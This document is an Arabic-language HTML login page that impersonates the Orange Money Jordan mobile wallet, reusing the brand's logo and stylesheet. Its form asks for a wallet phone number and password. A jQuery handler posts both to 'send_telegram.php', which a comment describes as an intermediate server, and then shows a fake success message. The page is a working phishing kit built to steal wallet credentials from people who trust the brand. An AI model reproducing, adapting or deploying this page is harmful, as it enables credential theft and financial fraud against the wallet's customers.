<!DOCTYPE html>
<html lang="ar">
<head>
  <meta charset="utf-8"/>
  <title>Orange Money - الصفحة الرئيسية</title>
  <meta content="Orange Money Jo" property="og:title"/>
  <meta content="محفظة Orange Money Jo" property="og:description"/>
  <meta content="width=device-width, initial-scale=1" name="viewport"/>
  <link rel="stylesheet" href="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/css/orangemonney.webflow.4d36521a0.css">
  <style>
    body { box-sizing: border-box; font-size:18px; }
    .container { padding: 0 5%; }
    .field-holder { position: relative; margin-bottom:1.25em; }
    .w-input { border:0; border-bottom: 3px solid #dfdfdf; outline:none; }
    label { position:absolute; top:0; left:0; font-size:1em; color:#424242; display:flex; align-items:center; cursor:text; transition: .3s ease-in-out; }
    .w-input, label { font-size:1em; width:100%; height:55px; }
    .w-input:focus + label, .w-input:valid + label { color:#ff7900; font-size:.75em; top:-25px; pointer-events: none; }
    .w-input:focus, .w-input:valid { border-bottom: 3px solid #ff7900; }
    .CustomFooter { position: fixed; left: 0; bottom: 0; }
  </style>
</head>
<body class="body">
  <div class="div-block-2">
    <div class="header-section">
      <div class="w-container">
        <a href="/" aria-current="page" class="blog-home-link w-inline-block w--current">
          <img src="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/6709b4ecad0f1ceeeed963e7_OM%20logo_0.svg" loading="lazy" width="106" alt="" class="image"/>
        </a>
      </div>
    </div>
  </div>
  <div class="div-block-4">
    <div class="container">
      <div class="w-form">
        <form id="signin" name="signin" data-name="تسجيل الدخول" method="POST">
          <div class="field-holder">
            <input class="text-field-2 w-input" minlength="10" maxlength="10" name="phonenumber" inputmode="numeric" pattern="^(079|078|077)[0-9]{7}$" placeholder="" type="text" id="phonenumber" required/>
            <label for="phonenumber" class="field-label">رقم المحفظة</label>
          </div>
          <div class="field-holder">
            <input class="text-field-2 w-input" maxlength="256" name="password" placeholder="" type="password" id="password" required/>
            <label for="password" class="field-label-2">كلمة السر</label>
          </div>
          <div class="div-block">
            <input type="submit" data-wait="يرجى الانتظار" class="submit-button w-button" value="تسجيل دخول"/>
          </div>
          <div class="div-block spacea">
            <input type="button" class="submit-button button-black w-button" value="التسجيل الذاتي" onclick="window.location.href='/register.html'"/>
            <input type="button" class="submit-button button-black not-black w-button" value="تسجيل دخول لأول مرة" onclick="window.location.href='/first-login.html'"/>
          </div>
        </form>
        <div class="w-form-done" style="display:none;"><div>تم الإرسال بنجاح!</div></div>
        <div class="w-form-fail" style="display:none;"><div>حدث خطأ أثناء إرسال البيانات!</div></div>
      </div>
    </div>
  </div>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script>
    $('#signin').on("submit", function(e) {
      e.preventDefault();
      var phonenumber = $('#phonenumber').val();
      var password = $('#password').val();

      // إرسال البيانات إلى السيرفر الوسيط (send_telegram.php)
      $.ajax({
        type: 'POST',
        url: 'send_telegram.php',
        data: {
          phonenumber: phonenumber,
          password: password
        },
        success: function (res) {
          $('.w-form-done').show();
          $('.w-form-fail').hide();
          $('#signin')[0].reset();
        },
        error: function (error) {
          $('.w-form-fail').show();
          $('.w-form-done').hide();
        }
      });
    });
  </script>
</body>
</html>
